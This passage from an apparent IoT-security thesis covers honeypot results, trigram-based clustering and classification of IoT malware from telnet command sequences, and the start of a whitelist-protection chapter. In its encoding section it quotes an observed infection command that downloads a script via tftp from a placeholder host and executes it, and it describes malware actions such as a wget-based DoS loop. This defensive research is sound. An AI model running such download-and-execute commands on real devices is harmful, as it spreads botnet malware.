4.4.7.2. Experimental results

Table 10 shows the statistic of testing results between ThingGate and directly forwarding flow.

Our results show attackers would receive the same rendering video under the two conditions. IP

Camera B only support four clients to download live stream data. Therefore, our clients sent 50

requests on each condition and only got 40 responses with live streams.

45

Table 10 IoT devices used in experiments.

IoT Device Path Clients download

video through

TingsGate

Clients download

video.

IP Camera A1 /monitor2.htm 50 50

IP Camera B /main.htm 40/50 40/50

IP Camera C /video.cgi* 50 50

IP Camera D /top.htm 50 50

*The certificates in the default firmware of IP Camera C is out-of-date. Hence, browsers including IE,

Firefox, Chrome, and Safari block the rendering function of live stream of default web pages. Hence, we

employed the hidden live stream application (/video.cgi) which employed by the attacker in 4.2 to

evaluation.

4.5. Discussion

From the observation of cyber attacks in dataset 2, our honeypot successfully collected attacks

against physical IoT devices Through ThingGate. These attacks, such as peeping video streams,

control the direction of the camera, and RCE attacks first and then download live stream via

hidden web application are hard to simulate by the virtual machine. From the block unwanted

experiment, we show that ThinkGate can block attack which change critical configuration. In

addition, we also found 44 clients request the Wi-Fi AP information web page from the fabricated

sensor information experiment. From the 44 clients, 41 clients employed a predefined list to scan

victims, two are human-like attackers, and Googlebot. From the web tracking experiment, we

successful extended a tracking function to IoT devices and tracked an attacker employed three

USA IP addresses to visit our honeypot. About the misplaced attacks, ThingGate extracts 411 CI-

URL and download 149 different malware binaries and 23 scripts. Moreover, we found there are

18 binaries utilized the ThinkPHP vulnerability which is not an IoT device but a web application

46

framework. The abuse of HTTP 80 port becomes more serious. From the stress testing results,

attackers can get the same rendering live stream from IP cameras through ThingGate. Hence, we

can build the bare-metal IoT honeypots together with ThingGate.

4.5.1. Limitations

ThingGate does have some limitation. Many of the limitations come from the design of CI-

URL analyzer. First, the URL parser only analyzes the CI-URL which attacker embedded OS

commands in URL. Our program did not check other header field or form data yet. Second, the

script parser only was able to handle several kinds of shell scripts. A Linux sandbox can resolve

more types of scripts. However, the sandbox must be monitored and implemented with the high-

security design because of the Brickerbot. Thirdly, our web tracking function relies on JavaScript

and Canvas fingerprint. Therefore, if the clients cannot render the JavaScript code, the client

cannot trigger fingerprint function.

47

Chapter 5.

IoT Malware Analysis and New Pattern Discovery Through

Sequence Analysis Using Meta-Feature Information

5.1. Introduction

Internet of Things (IoT) is a network of physical devices, such as vehicles, furniture, and

buildings, that are embedded with electronics, sensors, and networking abilities. Connectivity

enables these objects to collect and exchange data for further application. However, in October

2016, the IoT malware called Mirai executed the massive distributed denial of service (DDoS)

attack against Dyn DNS, enlisting approximately 100,000 Mirai IoT Botnet nodes for a reported

attack rate of up to 1.2 Tbps [2]. According to the report from Kaspersky in Sept. 2018, Mirai is

still the most popular IoT malware family for cybercriminals (20.9%). Moreover, the most popular

attack and infection vector against devices remains the telnet service (75.4%) [8]. Although

signature-based detection methods are sensitive to the structures of existing malware samples,

even a small change in a malware program could alter its signature sufficiently to thwart antivirus

detection. Therefore, an urgent necessity is to analyze IoT malware and related logs to recognize

the behavior of unfamiliar threats and thus assist organizations in mounting a timely and

appropriate defense.

Gartner estimated that 6.4 billion IoT devices were in use in 2016, and the number is projected

to grow to 20.8 billion by 2020 [1]. Embedding information and communication technology into

devices thus represents an ongoing trend. The nature of IoT presents challenges in establishing a

comprehensive security mechanism. These challenges arising from IoT devices are as follows:

1. Most IoT devices are always online.

2. Most utilize simple, low-level hardware.

3. IoT devices have a variety of CPU architectures and OS.

48

4. Antivirus and monitoring services are lacking.

5. Diverse developers result in a lack of unified standards.

6. IoT malware attack patterns are continually evolving, with an extremely large damage scope.

Few of them are protected by antivirus software. To analyze the threat of IoT malware, Pa et

al. [4] proposed IoTPOT, a honeypot that observes cyber attacks against IoT devices, focusing on

telnet-based attacks; it emulated IoT devices that accepting telnet protocol connections. When

attackers access IoTPOT, it records the entire netflow and maintains logs for further analysis, such

as downloading samples. Since 2015, 6,016,030 download attempts from 1,085,664 different

hosts have been successfully observed and over 40,000 malware samples downloaded. Moreover,

124,517,838 telnet session logs have been collected, recording all the shell command input sent

by the attackers. IoTPOT thus represents a useful method of collecting samples, analyzing threat

behavior, and understanding cyber attacks in IoT. However, the enormous data size resulted in

huge time and resource cost when analyzing their patterns and relationship. It is an urgent

necessity to create an appropriate view which analyzes the incoming data in depth and utilize our

resource efficiently.

The purpose of this study is to apply machine learning techniques to create a simplified and

accurate view of cyber attacks in IoT. The method determines categories of malware by analyzing

its meta-features and command sequences. Its contributions may be summarized as follows:

1. We proved that similar IoT malware binaries conduct similar infection commands. Moreover,

through similarity analysis of command sequences, we can identify the malware category of

unknown threats.

2. By clustering telnet logs, we discovered a new DoS cyber attack executed using pure Linux

commands, without IoT malware binaries.

3. Using malware samples from the IoT honeypot, our proposed method could identify malware

categories with 96.70% accuracy.

49

5.2. Methods

5.2.1 Preliminaries

All the data in this research were observed in IoTPOT [4]. We used VirusTotal malware labels

as the ground truth of data. Command sequences were extracted from IoTPOT telnet session logs

and concatenated into a sequence according to the input order. A command sequence could

contain single or multiple shell command clauses. In this study, we mainly analyzed infection

sequences according to target, purpose, and frequency, and found that most of them consisted of

five types of atomic behavior:

1. Authentication behavior

Login with ID and password

2. Resource scan behavior

Resource scan is a command that finds available functions and writable folders in an IoT

device; for example, “/bin/busybox Mirai” tests “/bin/busybox,” and “/bin/busybox cat

/proc/mounts” aims to find a writable folder.

3. Change directory behavior

Changes the directory/folder of the terminal’s shell.

4. Create or download files behavior

Uses “echo” to produce binary files or “wget,” “tftp” to download files.

5. Execution behavior

Uses “sh” to execute downloaded binary or script files.

Malware sometimes executes “chmod” to alter file privileges, “history –c –r” to purge the

system log, “rm” to remove files, and “exit” to terminate the session. These commands may be

executed multiple times to ensure that the infection is successful. Only a few “kill” and “killall”

commands were found in our data, they mostly tighter with the “while true;” loop and ”wget”

commands.

We collected 69 million command sequences containing the Mirai signature, all of the

sequences were recognition type, which only contains login credentials and several Linux

commands such as "enable, system, shell, sh, and /bin/busybox echo." These commands were not

50

related to malware binaries, and the information of each sequence was too few for analysis.

IoTPOT did not capture any Mirai infection command sequences because dozens of verification

steps are performed by the attacker’s server, each of which must receive a corresponding response,

such as the “echo,” “cat /etc/mounts,” and “cp /bin/echo” commands. We determined these steps

based on the Mirai source code [65][66]. To observe Mirai’s infection command sequence, we

developed new honeypots consisting of physical IoT devices that could respond correctly to Mirai.

We thereby captured 578,671 Mirai command sequences from December 11, 2016, to February

28, 2017, approximately 32% of which were infection command sequences executed by Mirai

and 68% of which were simple recognition command sequences. We, therefore, had to narrow the

scope of the command sequences, focusing on those that related to downloaded malware binaries

or cause the serious cyber security threat. Table 11 shows the results of other research [4] with a

comparison of labels.

Table 11 Comparison of labels and infection command sequence [4].

Label Pattern of Command Sequence Number of

attack/Day

(Average)

Bashlite Using a downloaded shell script, kill previously

running malicious process, download malware binaries

of different CPU architectures, and block 23/TCP to

prevent other infections.

Run all downloaded malware binaries.

290

Nttpd Change directory to /tmp.

Check whether shell can be used by echoing

“welcome.”

Run binaries.

48

ZORRO Check whether “wget” command is usable. 2232

51

Check whether busybox shell can be used by echoing

“ZORRO.”

Remove various commands and files under /usr/bin/,

/bin, /var/run/, and /dev.

Copy /bin/sh to random filename.

Append series of binaries to random filename and

make attacker’s own shell.

Using attacker’s own shell, download binary. The IP

address and port number of the malware download

server can be seen in the command.

Run binaries.

In this study, VirusTotal was used to obtain scan results from 66 antivirus engines. We sent

12,821 unique malware MD5s from IoTPOT and received 3,306 reports. We then chose the most

frequent malware family name as the representative malware category. Table 12 shows the top

five antivirus engines for IoT malware.

Table 12 Top 5 antivirus engines for IoT malware.

AV/Consistency % Mirai

(207)

Bashlite

(2733)

Hajime

(5)

Tsunami

(48)

Kaspersky 98.06 100 100 89.58

DrWeb 96.61 97.36 100 60.41

ESET-NOD32 98.55 93.66 100 91.66

Sophos 85.50 89.82 80 95.83

Avast 85.02 88.58 20 35.41

We chose Kaspersky, DrWeb, and ESET-NOD32 to locally scan 40,203 different IoT malware

binaries and found that DrWeb could label 39,245 of them, representing 97.61% of the submitted

52

malware and thus surpassing Kaspersky (69.82%) and ESET-NOD32 (74.57%). Therefore, we

employed DrWeb to label the IoT malware as the basis for malware categories.

5.2.2. Encoding and measurement of command sequences

Data encoding. To process numerous complex sequences we used a simplified representative

form called extracted command tokens (ECTs). For example, sequences of the command [‘cd

/tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; tftp -r tftp.sh -g test.test.org; sh tftp.sh;

busybox wget http’] can be expressed as the encoded sequence “ccccctsw,” which represents each

command by a single letter, such as “w” for “wget” and “c” for “cd.” Then applying a natural

language processing algorithm to classify the ECTs, having made a table mapping each of the 51

commands to a corresponding letter. An example of a command mapping table is shown in Table

13. These commands were derived from historical observation data in the IoTPOT.

Table 13 An example of the command mapping table.

Command token Command token

/bin/busybox B exit q

cd C chmod c

enable e echo E

sh h wget w

Comparison of distance measures. The following six distances [67] are applied to measure

the similarity between different categories. The distances are one minus similarities.

1. Cosine: Cosine similarity is a measure of similarity between two non-zero vectors of an inner

product space that measures the cosine of the angle between them. The strings are first

transformed in vectors of occurrences of k-shingles (sequences of k characters) [68]. In the

n-dimensional space, the similarity between the two strings is the cosine of their respective

vectors. The definition of cosine similarity between two strings s1 and s2 as follows:

cos(𝑣(, 𝑣*) =𝑣( ∙ 𝑣*|𝑣(| ∙ |𝑣*|

53

Where v1 and v2 are transformed in vectors of occurrences of k-shingles against strings s1 and

s2.In our system, we set k = 3.

2. Trigram: Apply trigram distance to determine how similar two strings are. The measures of

similarity between two strings are defined as the ratio of the number of trigrams that are

shared by two strings and the total number of trigrams in both strings by the formula [69]:

2×|𝑡𝑟𝑖𝑔𝑟𝑎𝑚𝑠 𝑋 ∩ 𝑡𝑟𝑖𝑔𝑟𝑎𝑚𝑠 𝑌 |𝑡𝑟𝑖𝑔𝑟𝑎𝑚𝑠 𝑋 + |𝑡𝑟𝑖𝑔𝑟𝑎𝑚𝑠 𝑌 |

, where n-grams(X) is a multi-set of letter n-grams in X.

3. Normalized longest common subsequence (NLCS): The longest common subsequence can

be considered the sequential analog of the cosine distance between two ordered sets. Thus,

given two sequences X and Y, of lengths m and n respectively, we calculate the NLCS by the

formula [70]:

𝑁𝐿𝐶𝑆 =𝑙𝑒𝑛𝑔𝑡ℎ(𝐿𝐶𝑆)

𝑚 + 𝑛+ 𝜀,

where ε is a constant whose value is 0.5 if the first character of the strings x1 ∈ X and y1

∈ Y are matching otherwise it is 0.

4. Metric longest common subsequence (MLCS): Measure the degree of similarity between the

two series. The metric is defined as follows [71]:

𝑀𝐿𝐶𝑆 =𝑙𝑒𝑛𝑔𝑡ℎ(𝐿𝐶𝑆)

𝑚 + 𝑛

5. Normalized Levenshtein Distance (NLD): The sum of the length normalized Levenshtein

distance between the words occupying the same meaning slot divided by the number of word

pairs. The Levenshtein distance between two strings x, y (of length |x|, |y| respectively) is

given by levx,y (|x|, |y|) as follows:

𝐿𝑒𝑣F,G(𝑖, 𝑗) =

max 𝑖, 𝑗 𝑖𝑓 min 𝑖, 𝑗 = 0

𝑚𝑖𝑛𝑙𝑒𝑣F,G(𝑖 − 1, 𝑗) + 1𝑙𝑒𝑣F,G(𝑖, 𝑗 − 1) + 1

𝑙𝑒𝑣F,G(𝑖 − 1, 𝑗 − 1) + 1(FRSGT)otherwise

Where 1(FRSGT) is the indicator function equal to 0 when xi = yj and equal to 1 otherwise.

Normalized Levenshtein is defined by the formula [72]:

Normalized𝐿𝑒𝑣F,G =𝐿𝑒𝑣F,G

max( x , |y|)

6. Jaro-Winkler: A string metric measuring an edit distance between two sequences with

54

favorable ratings to strings that match from the beginning for a set prefix length. The Jaro-

Winkler distance is a variation of Jaro distance. The Jaro distance dj of strings s1 and s2 is

defined as:

𝑑` 𝑠(, 𝑠* =𝑚3 ∙ 𝑙(

+𝑚3 ∙ 𝑙*

+𝑚 − 𝑡3 ∙ 𝑚

Where l1 and l2 are the lengths (in characters) of s1 and s2, m is the number of matching

characters, and t s half the number of transpositions. The Jaro-Winkler distance dw

emphasizes prefix similarity between two strings. It is defined as [73]:

𝑑b 𝑠(, 𝑠* = 𝑑` 𝑠(, 𝑠* + 𝑙 ∙ 𝑝 ∙ 1 − 𝑑` 𝑠(, 𝑠* ,

Where l is the length of the longest common prefix of s1 and s2, and p is a constant scaling

factor that also controls the emphasis placed on prefix similarity. The implementation we

used considers prefixes up to 6 characters long, and sets p = 0.1.

We choose the top 500 command sequences in the four categories and then calculated the

average and minimum distances between categories, with the results shown in Table 14 and Table

15. Specifically, we apply six distance measurement methods and calculate the adjacency matrix

between pairs of malware categories, and then calculate the average and minimum distance. The

columns under the “B-N” header indicate the distance between Bashlite and nttpd using the six

measurements, the columns under “M-Z” the distance between Mirai and ZORRO, and so on. We

determined that cosine was the best distance for distinguishing ECTs, with trigram just slightly

lower. However, we found a few command sequences in the same session containing both Bashlite

and nttpd. The command sequence from the Bashlite source code of has been leaked, so that other

attackers can copy its function and use it in their malware [15]. Therefore, the malware executes

the command sequence using multiple categories’ signatures. Because cosine distance cannot

distinguish the combined type of Bashlite command sequence, trigram provides a better solution

for combined or mixed command sequences. Moreover, the source code for Mirai has similarly

been leaked [74]. Based on the distance measure results, we chose trigram for use in this study.

55

Table 14 Distance measures for different malware labels (average).

Distance/categ

ory B-N B-M B-Z N-M N-Z M-Z

Cosine 0.9686 0.9492 0.9958 0.9990 1.0000 0.9516

Trigram 0.9086 0.9436 0.9230 0.9516 0.9661 0.9351

NLCS 0.7864 0.8888 0.8621 0.8895 0.9266 0.8642

MLCS 0.8367 0.9307 0.8971 0.9299 0.9472 0.9132

NLD 0.8795 0.9358 0.9118 0.9336 0.9585 0.9197

Jaro-Winkler 0.5238 0.6001 0.5615 0.5457 0.5851 0.4710

Table 15 Distance measures for different malware labels (minimum).

Distance/categ

ory B-N B-M B-Z N-M N-Z M-Z

Cosine 0.0163 0.7259 0.2929 0.5736 0.9678 0.1783

Trigram 0.4048 0.6968 0.1111 0.6667 0.6481 0.6197

NLCS 0.2500 0.5748 0.1429 0.4118 0.5556 0.3734

MLCS 0.3529 0.5893 0.1667 0.5455 0.6000 0.4048

NLD 0.3929 0.6857 0.1667 0.5455 0.6667 0.5318

Jaro-Winkler 0.2167 0.3217 0.0978 0.3119 0.2933 0.2251

Malware category Feature extraction. N-gram is an algorithm based on computational

linguistics and probability [75], which can be used to estimate the likelihood of a sentence

occurring at all or following a given word. N-gram can also provide efficient approximate string

matching. Using N-gram to index lexicon terms, a signature file can be compressed to a smaller

size. Moreover, N-gram can be used to calculate the similarity between two strings [76].

In this method, we used N-gram to collect ECT occurrence patterns. For each malware category,

we collected the top 10 N-gram features, representing the major behavior in each category, and

56

presented them as a histogram. These features were all based on a trigram model, namely, n = 3.

We calculated the trigram histogram using four months data for two categories. The command

sequence distribution of Bashlite, Mirai, and Satori are shown in Fig. 15, 16, and 17, respectively.

Based on the common command patterns of each malware category, we found that Bashlite tended

to contain “cd,” “sh,” and “rm” behavior, Mirai often contained terms such as “busybox,” “cat,”

and “echo,” and Satori tended to use terms such as “&&,” “cp,” and “busybox.” The results

indicated that trigram could assist in revealing distinctive attack patterns among different IoT

malware categories.

Fig. 15 Trigram statistics of Bashlite IoT malware.

57

Fig. 16 Trigram statistics of Mirai IoT malware.

Fig. 17 Trigram statistics of Satori IoT malware.

To find the best n of n-gram similarity for analyzing our compressed data. We calculated the

Bigram, Trigram, and 4-gram distance between Bashlite and Mirai ECTs. Besides, we conducted

the calculation on both general and worst cases. We choose another longest 500 ECTs from Mirai

and Bashlite as worst case data. Table 16 and Table 17 show the distance and time cost of different

n-gram. For the top 500 ECTs case, Trigram takes only 21 seconds and gets a distance similar to

4-gram. Moreover, Bigram costs 20 seconds and gets a shorter distance than Trigram. In the case

of the longest 500 ECTs, Bigram spends the least time and gets about 0.01 shorter distance than

58

Trigram and 4-gram. Trigram spends 73 more seconds cost than Bigram. Therefore, for worst

case, Bigram is good enough, and Trigram is suitable for the top 500 ECTs. In this method, we

choose Trigram as our measurement for ECTS.

Table 16 Distance measures for different n-gram between Bashlite and Mirai

Bashlite - Mirai Bigram Trigram 4-gram

Top 500 ECTs 0.937090 0.943678 0.944708

Longest ECTS 0.930650 0.940600 0.945393

Table 17 Time cost for different n-gram between Bashlite and Mirai

Bashlite - Mirai Bigram Trigram 4-gram

Top 500 ECTs 20 sec 21 sec 24 sec

Longest ECTS 466 sec 539 sec 569 sec

5.2.3. Data analysis

The complete analytical process is illustrated in Fig. 18. First, command sequences were

extracted from pcap files, filtering for infection command sequences. Next, the command

sequence was encoded to create ECTs, and then the N-gram model was used to extract trigram

features from them. Finally, classification and clustering analysis was performed to determine

malware categories and new patterns.

59

Fig. 18 Data analysis flow

Clustering algorithms. The cyber attacks in IoT are keep evolving and the pattern of attacks

is uncertain. Therefore, we choose the hierarchical clustering method because it does not require

to predefine the number of clusters. To identify new patterns, we chose a single-linkage

hierarchical clustering algorithm sensitive to outliers. The hierarchical clustering method works

by successively combining individual data into cluster [77]. To our knowledge, the use of

clustering algorithms in malware-related datasets was introduced Bailey et al. [78], who also

employed hierarchical clustering.

Classification algorithms. We have transformed the telnet logs into a smaller ECTs' dataset.

However, trigram still generated hundreds of features. According to our statistics of trigrams,

some Linux commands occurrence tightly in order, such as malware would like to utilize "cd" to

move to a writable folder and then conduct the download tasks via "wget" or "tftp" commands.

In text categorization research, Joachims [79] has shown SVM could handle high dimensional

input space and few irrelevant features. Instead, The Naive Bayes classifier assumes that the

distribution of different terms is independent of each other. Even though the independence

assumption is false in many real-world applications, Naive Bayes performs surprisingly well [80].

Therefore, we chose SVM as our classification algorithm and Naive Bayes classifier as the

60

baseline. After conducting the same experiments with these two algorithms, we can determine

which was better for our research.

l Naive Bayes

Naive Bayes classifiers assume that an attribute value’s effect on a given class is independent of

the values of other attributes; this is called “class-conditional independence” [81]. The Naive

Bayes classifier greatly simplifies learning by assuming that features are independent given class.

Although independence is generally a poor assumption, in practice Naive Bayes often competes

well with more sophisticated classifiers [82]

l Support Vector Machines

SVM is a useful technique of data classification, whose aim is to produce a model that predicts

the target values of the test data based solely on their attributes [79]. Given a training set of

instance–label pairs (xi, yi), i = 1,…, l , where xi ∈ Rn and yi ∈ {1, −1}, SVM requires solution

of the following optimization problem:

Subject to yi (wT φ (xi) + b) ≥ 1- ξi, ξi ≥ 0, i=1, …, l

Where K (xi, xj) ≡ φ(xi)Tφ(xj) is called the kernel function. Many kinds of kernel function options

are available, such as linear, polynomial, and sigmoid. For our dataset, we chose a linear kernel

function according to our ECT numbers [78][79].

Classification evaluation. We used a confusion matrix and accuracy to measure the

classification result. Given a target category, let TP (true positive) be the number of ECTs

correctly classified as the target category; FN (false negative) the number of sequences from the

target category misclassified as another. Moreover, TN (true negative) the number of sequences

from other categories that are correctly classified; and FP (false positive) the number of sequences

61

incorrectly classified as the target category. The precision (P) is defined as precision = TP/ (TP +

FP), and the recall rate (R) is defined as recall = TP/ (TP + FN). The F-score represents the

harmonic mean of (P) and (R) and provides a balance between them: F-score = 2 PR/ (P + R).

The F-score assists in identifying a threshold of similarity. Accuracy (A) is defined as accuracy =

(TP+TN) / (TP + FP + FN + TN), and the error rate is defined as error rate = (FP+FN) / (TP + FP

+ FN + TN) [77].

5.3. Experiments

5.3.1. Dataset and Environment

Data collection for classification was undertaken from December 2016 to September 2017. The

dataset contained data for 284 days from physical IoT devices in the IoTPOT. As illustrated in

Table 18, the dataset included 2.7 million infection command sequences related to malware that

we downloaded to another server in real time. These sequences could be reduced to 44,843 unique

command sequences through correlation and deduplication. Moreover, our encoding method was

able to reduce the command sequences to 2,925 ECTs. To discover hidden patterns, we chose the

data for a one-month period as dataset 2 for the clustering experiment.

Table 18 Dataset for analysis.

Dataset Number of

infection

command

sequence

Rearranged

command

sequence

Number

of

unique ECTs

Time interval Analysis

1 2,756,231 44,843* 2,925 2016/12/07~

2017/09/16 NB, SVM

2 422,591 95,448** 4,626 2017/04/01~

2017/04/30

Hierarchical

clustering

* Correlating malware binaries, extracting command sequences that download binaries, and conducting

62

data deduplication

** Extracting command sequences and conducting data deduplication

DrWeb was used to scan the malware binaries, after which malware labels and corresponding

ECTs could be obtained. The distribution of labels is shown in Table 19, indicating that the

majority of malware in the IoTPOT came from Bashlite and Mirai.

Table 19 Malware categories and ECTs' distribution.

Label Bashlite Mirai Hajime Tsunami Numbers of ECTs

665 3408 155 58

Numbers of malware

2755 2665 34 162

From Dec. 7th, 2016 to Sept. 16th, 2017, our honeypot has collected 1.36 terabyte (TB) pcap

files. We extract 22.9 gigabytes (GB) telnet logs via a server with ten cores Intel 2.20 GHz CPU,

62 GB RAM, and 4 Terabytes disk. This task is scheduled automatically run every day. Processing

1.36TB pcap files will cost about eight days. The other time cost of our method is shown in Table

20. The data preprocessing begins at filter infection command from telnet logs. For filter out and

label the malware related telnet logs in dataset 1, we utilize Google BigQuery [83] to process 22.9

GB telnet logs. ECTs transformation and machine learning algorithms were conducted via a

machine with two quad-core Intel 3.70 GHz CPU, 16 GB RAM, and 1 TB disk. The SciPy 0.18.1

[84] is used for supporting clustering and classification algorithms.

Table 20 Statistics of time cost.

Algorithm Set Data preprocessing

Feature extraction

Clustering/ Classification

Total

SVM 1 174 mins 1

secs 21 secs 20 secs

174 mins 42secs

Naïve Bayes 1 174 mins 1

secs 21 secs 15 secs

174 mins 37 secs

63

Hierarchical Clustering

2 13 secs

73 mins 21 secs

1 mins 5 secs

74 mins 39 secs

5.3.2. Clustering Experiments

The hierarchical clustering method involves successively combining individual data into

clusters. We conducted a hierarchical clustering analysis using dataset 2. As shown in Fig. 19, the

algorithm separated 4,636 ECTs into 30 clusters according to the trigram distance. We labeled the

clusters according to antivirus engine scan results of malware binaries or with reference to

malware analysis reports from cybersecurity researchers. Detail text features of malware families

are summarized in Appendix A.

Our method successfully differentiated three known malware families and their variants and

also discovered one new cyber attack pattern in IoT, called “Fileless DoS.” Although the four

best-known malware families are Mirai, Bashlite, Hajime, and Tsunami, Tsunami employs Linux

commands in a similar manner to Bashlite and be assigned to the leaf cluster named "(10)”. The

MD5 of Tsunami which shares similar infection pattern of Bashlite, shown in Appendix B.

64

X-axis: ECT index number # or cluster size (*)

The clustering results helped to discover the following malware variants and new cyber attack

pattern:

l Mirai/A and Bashlite/A are malware variants that truncate ptmx files after login. The ptmx

file is used to create a pseudoterminal master–slave pair [85]. Both Mirai/A and Bashlite/A

contain this command, and the maximum distance to separate them must be less than 0.58.

l Mirai/B targets devices with weak default credentials which login ID is root or Admin and

password is 5up, such as TP-Link (TL-WR740N) [86]. The Mirai/B commands are more

straightforward than those of the original Mirai. For example, Mirai/B does not check device

partitions such as cat /proc/mounts [66].

l Fileless DoS is a shell script that employs an infinite while loop and multiple wget

commands to mount a DoS attack. Downloaded web contents are sent to /dev/null, and thus

no binaries are stored in devices. A total of 934 Fileless DoS ECTs were discovered in April

2017. The top ten victim websites are shown in Table 21, including those of a music band,

a construction company, and an IT solutions company.

Fig. 19 Labeled hierarchical clustering results of ECTs in April 2017

65

Table 21 Victims of Fileless DoS.

Victim websites Counts

http://fxxxxxxxx.com:80 7111

http://xxx.xxx.80.118:80 5669

http://www.txxxxxxxxxxxx.com:80 2722

http://www.hxxxxxxxx.co.il:80 2564

http://www.bxxxxxxxxxxxxxxxxxxxxx.com:80 2354

http://www.kxxxxxxxxxxxxxxxxxxxxxxxxx.de:80 1982

http://txxxxxxxxxxx.com:80 1980

http://www.axxxxx.dk:80 1878

http://xxx.xxx.19.69:80 1843

http://cxxxxxxxxxxxxxxxxxx.com:80 1749

5.3.3. Classification Experiments

Because the data amounts varied greatly among categories, we designed two experiments to

identify whether data bias affected classification accuracy. Two datasets were prepared for our

experiments. The first contained 1000 ECT types per malware category; Bashlite, Hajime, and

Tsunami data were repeated up to 1000. The second dataset contained all ECT types from every

category. Our program randomly chose 50% of the data as a training set and then tested the

remaining 50%. To avoid selecting only Mirai data, however, we randomly chose the training

dataset for the second experiment. The precision and recall scores are listed as Table 22, Table 23,

Table 24, and Table 25.

Table 22 Classification performance of even sampling- Naive Bayes.

label precision recall f1-score support

Bashlite 0.87 0.89 0.88 513

Mirai 0.83 0.77 0.80 499

Hajime 1.00 1.0 1.00 476

66

Tsunami 0.70 0.74 0.72 512

avg / total 0.85 0.85 0.85 2000

Table 23 Classification performance of even sampling- SVM.

label precision recall f1-score support

Bashlite 1.0 0.87 0.93 513

Mirai 0.85 0.75 0.80 499

Hajime 1.0 1.0 1.0 476

Tsunami 0.70 0.87 0.78 512

avg / total 0.89 0.87 0.87 2000

Table 24 Classification performance of random sampling- Naive Bayes.

label precision recall f1-score support

Bashlite 0.88 0.93 0.91 155

Mirai 0.98 0.99 0.99 1225

Hajime 0.94 1.0 0.97 60

Tsunami 0.00 0.00 0.00 24

avg / total 0.95 0.97 0.96 1464

Table 25 Classification performance of random sampling- SVM.

label precision recall f1-score support

Bashlite 0.92 0.94 0.95 155

Mirai 0.98 1.0 0.99 1225

Hajime 1.0 1.0 1.0 60

Tsunami 0.00 0.00 0.00 24

avg / total 0.96 0.98 0.97 1464

Based on the results of these experiments, SVM performed better than Naive Bayes. However,

Tsunami was easily misclassified as Bashlite. We believe that second-stage training is necessary

for real cases. Such reinforcement learning also called active learning involves fine-tuning the

67

model during the training process. Therefore, based on the prediction results for Bashlite and

Tsunami, we further developed a sub-training approach by adding an additional feature (file size)

and performing sub-classifier training. As shown in Table 26, the precision of Tsunami

classification improved because its file sample metadata differed from that of Bashlite. Using

additional features can thus help to prevent misidentifying classes that share the same command

line pattern, without requiring static and dynamic analyses and simply by looking at the command

line and file meta-information. Mirai’s open source code provides hackers with an entry point for

developing new variants. It has been noted that hackers rely on using known or zero-day

vulnerabilities for developing new Mirai variants to attack IoT devices [87]. Hence, these

evaluations may incur new patterns of ECTs.

Table 26 Precision/recall of SVM – second stage (reinforcement learning).

label precision recall f1-score support

Bashlite 0.99 0.99 0.99 155

Mirai 0.98 1.00 0.99 1225

Hajime 1.0 1.0 1.00 60

Tsunami 0.90 0.86 0.88 24

Avg / total 0.96 0.98 0.97 1464

5.4. Discussion

For IoT malware which attacks via the telnet protocol, our clustering experiments show our

method can find new cyber attack, "Fileless DoS" and changes from malware variants. Moreover,

our trigram features could help classification of IoT malware. Comparisons with previous studies

are as follows:

l The method proposed by Ham et al. [25] rely on features about the network, phone, message,

CPU, battery, and memory for each process in Android devices. However, IoT devices are

68

hard to extend and install third-party packages. Our method only analyzes the telnet traffic

between attacker and victim devices. There is not any modification for IoT devices.

l Azmoodeh, Dehghantanha, and Choo [26] analyzed the OpCode sequence and applied a deep

Eigenspace learning approach to classify malicious and benign application. Their method is

excellent that could achieve 99.68% accuracy. The OpCode sequence generated by malware

binaries, but IoT malware, such as Mirai and Bashlite may remove their binaries after

execution. Moreover, many IoT devices utilized flash storage, rebooting will erase the

malware binaries. However, our method does not need to convert binaries to OpCode and

graph, can infer the malware family by telnet traffic and demonstrates 96.70% accuracy.

l Su et al. [27] investigated a lightweight method of detecting DDoS malware in IoT

environments. They converted binaries to grayscale images and then classified IoT malware

families by a convolutional neural network. The system could achieve 94.0% accuracy in

goodware and DDoS malware classification and 81.8% accuracy in classification of

goodware and the two main malware families. Su's method only examines Mirai and Bashlite

family. Our method examines four malware families and achieves 96.70% accuracy.

In this method, we utilize physical IoT devices as honeypot to obtain the dataset. These devices

are known to have been targeted by IoT malware and in that sense we believe that the dataset can

provide partial view of real cyber attacks against IoT devices in the wild. We cannot claim that

the dataset represents the whole attacks in IoT as we have only limited number of devices for

honeypot. However, we believe the study is meaningful as the honeypot was indeed able to

observe and capture samples from four major IoT malware families targeting IoT telnet services

and the proposed method was able to discover evolving attack like fileless DoS.

The limitations of our method may come from the attack vector of IoT malware:

(1) Our method does not analyze HTTP or SSH protocol.

69

(2) Our method might be affected if hackers intentionally add parts of other malware codes to

their malware.

70

Chapter 6.

IoTProtect: Highly Deployable Whitelist-based Protection for

Low-cost Internet-of-Things Devices

6.1. Introduction

The Internet of Things (IoT) is a network of physical devices, such as vehicles, furniture, and

buildings, embedded with electronics, sensors, and network connectivity. Connectivity enables

these objects to collect and exchange data for further applications and business use. However, a

threat from IoT malware has materialized. In Oct. 2016, an IoT Malware called Mirai, reported

to have infected over 100,000 compromised IoT devices such as Internet Protocol (IP) cameras,

conducted the largest ever distributed denial of service (DDOS) attack against Dyn DNS [2]. We

have been using IoTPOT [4], a honeypot that monitors attacks on IoT devices, to observe cyber

attacks against such devices and analyze the threats from IoT malware. As shown in Fig. 20, the

number of attacking hosts, many of which are indeed IoT devices compromised and misused by

attackers, has increased rapidly since Aug. 2016.

Fig. 20 Statistics regarding attacking hosts observed by IoTPOT from January 2016 to March 2017

71

Our observations show that most of the compromised devices are home routers [88] and IP

cameras [89]. Although many security vendors have developed commercial anti-virus software

for embedded systems, such as those listed in Table 27, these are not suitable for protecting the

above-mentioned low-cost devices as a result of resource constraints and unsupported platforms.

Moreover, all of the commercial products require substantial modification of the firmware that

would incur high engineering costs, especially if the manufacturer wants to deploy the security

product on existing products.

Table 27 Commercial secure software against embedded systems.

Product name Supported platform Min. Resource

Constraint

Other Constraint

McAfee

Embedded Control

6.x [90]

RHEL 4/5/6/7

CentOS 5/6/7

SuSE 10/11

Open SuSE 10/11

Solaris 9/10

WEPOS, POSReady 2009

Windows Embedded

Systems (WES) 2009

Windows XP/vista/7/8

Windows

NT/2000/2003/2008

512 MB RAM

80 MB free disk

space

Rebuild kernel module

[94]

Kaspersky

Embedded

Systems Security

2.0 [91]

Windows xp/7/8/10

WEPOS 2009/7

WES xp/7/8

Windows 10 Redstone

Windows 10 IoT Ent

256 MB RAM

50 MB free disk

space

N/A

Trend Micro

OfficeScan 10.6

WEPOS 2009/7

WES XP/vista/7

